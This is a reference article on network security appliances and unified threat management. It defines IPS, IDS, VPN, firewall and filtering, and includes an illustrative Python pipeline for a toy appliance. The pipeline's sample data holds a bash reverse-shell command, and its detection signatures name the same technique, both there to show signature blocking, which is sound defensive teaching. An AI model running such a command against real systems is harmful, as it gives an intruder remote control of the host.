Network Security Appliances
A Quick Reference to Appliances and Unified Threat Management
By 2008, IDC estimates that 80 percent of all security products will be delivered via an appliance (IDC).
Often used by organizations to ease remote management and to cut costs, a network appliance is typically an inexpensive, purpose-built computer that enables Internet access and a limited set of business-related activities (the end-user variety is sometimes called a thin client). Applications used on network appliances are typically housed on a Web server that the appliance accesses. Network appliances lack many of the features of a fully equipped PC and are often referred to as "closed box systems": they ship as a complete solution consisting of just the hardware and software needed to perform a single function or a specialized set of functions. Such a device allows for quick installation, ease of use and low maintenance, and is typically managed through a Web browser. Increasingly, appliances are used in network security to replace more traditional software-based security solutions.
Popular with business and enterprise, Unified Threat Management (UTM) is a category of security appliances that integrates a range of security features into a single device. UTM appliances combine firewall, gateway anti-virus, and intrusion detection system (IDS) or intrusion prevention system (IPS) capabilities into a single platform. UTM is designed to protect users from blended threats (attacks that combine several techniques, such as a worm that also installs a backdoor or sends spam) while reducing complexity. UTM appliances offer a way to manage multiple appliances from a single location, create and manage global security policies, provide real-time monitoring and logging, and present a single interface for managing security. It is essentially the evolution of traditional firewall and VPN (virtual private network) solutions, incorporating many additional products and services.
Network security appliances generally consist of a set of network management and security tools installed on-site. Many network security appliances also provide organizations with a secure VPN for remote access.
Terms to Know: Security Tools
(IPS) intrusion prevention system: An IPS is an inline device that applies policies and rules to network traffic and combines intrusion detection with the ability to act on what it finds. Where an IDS only alerts system or network administrators to suspicious traffic and leaves the response to them, an IPS can drop packets, reset connections or block the offending source automatically. Some compare an IPS to a combination of an IDS and an application-layer firewall. The trade-off is that a false positive on an IPS blocks legitimate traffic rather than merely raising an alert, so its signatures need tuning before it is switched from alert-only to blocking mode.
(IDS) intrusion detection system: An IDS inspects inbound and outbound network activity and identifies suspicious patterns that may indicate someone attempting to break into or compromise a network or system. An IDS detects a suspected intrusion as or after it takes place and signals an alarm; it does not itself block the traffic. An IDS also watches for attacks that originate from within the network, not only from the Internet.
(VPN) virtual private network: A network constructed by using public wires to connect nodes. For example, a number of systems let you create networks using the Internet as the medium for transporting data. These systems use encryption and other security mechanisms (such as authentication of each endpoint) to ensure that only authorized users can access the network and that the data cannot be read or altered if it is intercepted in transit.
firewall: A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in hardware, in software, or as a combination of both. They are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each one against a rule set and blocks those that do not meet the specified security criteria; a sound rule set ends with a default-deny rule so that traffic matching no explicit rule is dropped.
antivirus scanning: A utility that searches a hard disk (or, on a gateway appliance, the files and messages passing through the device) for viruses and removes or quarantines any that are found. Most antivirus products include an auto-update feature that downloads signatures of new viruses so that the scanner can check for them as soon as they are discovered.
content/spam filter: A pattern or list against which data is compared; depending on the policy, only data that matches is allowed through (an allow list) or anything that matches is blocked (a block list). On a security appliance, the Web content filter blocks requests based on a list of Web sites, stopping illegal, objectionable or non-business-related content, and the spam filter scores incoming mail against known spam patterns.
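As an added example (not code from the original article or from any product), the following Python models how a UTM-style appliance chains the tools defined above into one inspection path: firewall rules evaluated top to bottom, first match wins, with a default deny; a Web content filter driven by a domain block list with suffix matching; and signature-based payload inspection of the kind an IDS/IPS or gateway anti-virus performs. The rule set, the blocked sites, the signatures and the sample connections are all constructed for illustration.

```python
"""Toy UTM-style inspection pipeline (constructed example, not a real product).

A connection passes through three stages in order; the first stage that
rejects it decides the verdict. Every stage returns (allowed, reason).
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Connection:
    src: str                # source IPv4 address
    dst: str                # destination IPv4 address
    dport: int              # destination port
    proto: str = "tcp"
    host: str = ""          # requested Web site (HTTP Host header / TLS SNI), if known
    payload: bytes = b""    # application data visible to the inspector


@dataclass(frozen=True)
class FwRule:
    action: str                  # "allow" or "deny"
    src: str                     # CIDR, e.g. "10.0.0.0/8"
    dst: str                     # CIDR; "0.0.0.0/0" matches any address
    dport: Optional[int] = None  # None matches any port
    proto: str = "any"

    def matches(self, c: Connection) -> bool:
        return (
            ipaddress.ip_address(c.src) in ipaddress.ip_network(self.src)
            and ipaddress.ip_address(c.dst) in ipaddress.ip_network(self.dst)
            and (self.dport is None or self.dport == c.dport)
            and (self.proto == "any" or self.proto == c.proto)
        )


# Constructed policy: evaluated top to bottom, first match wins, and a
# connection that matches no rule is dropped (default deny).
FW_RULES = [
    FwRule("deny", "0.0.0.0/0", "0.0.0.0/0", dport=23),   # no telnet from anywhere
    FwRule("allow", "10.0.0.0/8", "0.0.0.0/0", dport=80),
    FwRule("allow", "10.0.0.0/8", "0.0.0.0/0", dport=443),
]

# Constructed block list of Web sites; every subdomain of an entry is blocked too.
BLOCKED_SITES = {"casino.example", "malware-host.example"}

# Constructed byte-pattern signatures of the kind an IDS/IPS or gateway AV matches.
SIGNATURES = {
    "bash-reverse-shell": b"/dev/tcp/",
    "eicar-test-file": b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE",
}


def firewall(c: Connection, rules=FW_RULES):
    """Stage 1: stateless rule match with first-match-wins semantics."""
    for r in rules:
        if r.matches(c):
            return r.action == "allow", f"firewall:{r.action}:port{c.dport}"
    return False, "firewall:default-deny"


def content_filter(host: str, blocked=BLOCKED_SITES):
    """Stage 2: suffix match, so www.casino.example hits the casino.example entry."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in blocked:
            return False, f"content-filter:blocked:{candidate}"
    return True, "content-filter:ok"


def signature_scan(payload: bytes, sigs=SIGNATURES):
    """Stage 3: substring signature match over the application payload."""
    for name, pattern in sigs.items():
        if pattern in payload:
            return False, f"ips:matched:{name}"
    return True, "ips:clean"


def inspect(c: Connection):
    """Run the stages in order and stop at the first one that rejects."""
    for allowed, reason in (firewall(c), content_filter(c.host), signature_scan(c.payload)):
        if not allowed:
            return False, reason
    return True, "allowed"


if __name__ == "__main__":
    samples = [
        Connection("10.1.2.3", "203.0.113.5", 23),
        Connection("192.168.1.9", "203.0.113.5", 443),
        Connection("10.1.2.3", "203.0.113.5", 80, host="www.casino.example"),
        Connection("10.1.2.3", "203.0.113.5", 443, host="intranet.example",
                   payload=b"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"),
        Connection("10.1.2.3", "203.0.113.5", 443, host="intranet.example",
                   payload=b"GET / HTTP/1.1"),
    ]
    for s in samples:
        print(s.src, "->", s.dst, s.dport, s.host or "-", inspect(s))
```

The ordering matters for performance and for what the logs show: the cheap five-tuple firewall check runs before the more expensive payload inspection, and the reason string records which stage rejected the connection, which is what an appliance's real-time monitoring and logging would surface.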
Common Network Security Options
Many of the antivirus and security functions integrated into appliances can also be incorporated into your network via software. Over traditional software solutions, appliances offer several benefits: they are easier to configure and manage, they offer better integrity (a hardened, single-purpose appliance exposes less to an attacker than a general-purpose computer running security software on top of a full operating system), and they generally perform better. When choosing a software solution, you also need to consider additional products and hardware (operating system, server hardware, storage servers) and provide maintenance and set-up configuration for the solution, including deployment, upgrades and monitoring. The additional hardware requirements and the configuration and maintenance costs are reduced or removed with appliances. One caveat: the appliance's embedded operating system and software still need patching, so the vendor's update schedule becomes your patch schedule.
In addition to choosing between software-based security and appliances, organizations can also look at what is traditionally called managed (or hosted) security. Rather than paying to own the appliance or server hardware and software, managed security is a subscription service model in which you essentially pay per service on an ongoing basis. Managed security is a more popular choice with small to midsized businesses, as the bulk of your security requirements are shifted to a third party outside your own company, leaving day-to-day security operations to someone else. While that may sound risky, you need to spend some time finding the right vendor with the right options to suit your network security needs, and to remember that outsourcing the work does not outsource the accountability for a breach.
Vangie 'Aurora' Beal -
Writer, www.Webopedia.com
Last updated: July 28, 2005
eSecurity Planet 
A resource for daily information on e-security targeted to IT managers.
The site provides users with information from a variety of sources,
including experts at security product and services firms, and the
consultants who follow the security industry.
One-Stop Network Security: Considering the Options 
Setting up and maintaining a reliable defense around your network
takes hardware, software, diligence and a good measure of security
expertise. That's a tall order for a small business. But that's
exactly what it takes to track constantly evolving threats, to
monitor network activity and to maintain the collection of tools
required to combat attacks.
Secure Software Begins in the Development Process
Though there are many risk mitigation options for the software management lifecycle (firewalls, intrusion detection/prevention systems, etc.), these don't address the root cause of the problem: a software development lifecycle (SDLC) that is not integrating security at each phase.
SOA Versus the Appliance
The appliance style of architecture seems to be at odds with the SOA architecture. Appliances are autonomous and tightly coupled software stacks, while SOA promotes distributed, loosely coupled software services.
Appliance vs. Software Comparison (PDF)
A frequently asked question in the tech industry is whether one should favor appliance-based solutions or software-based solutions. This is an entirely valid question, as products in the same category often take these two different approaches. It is vital for companies to understand the differences in cost, performance, security, installation, maintenance and support for these approaches.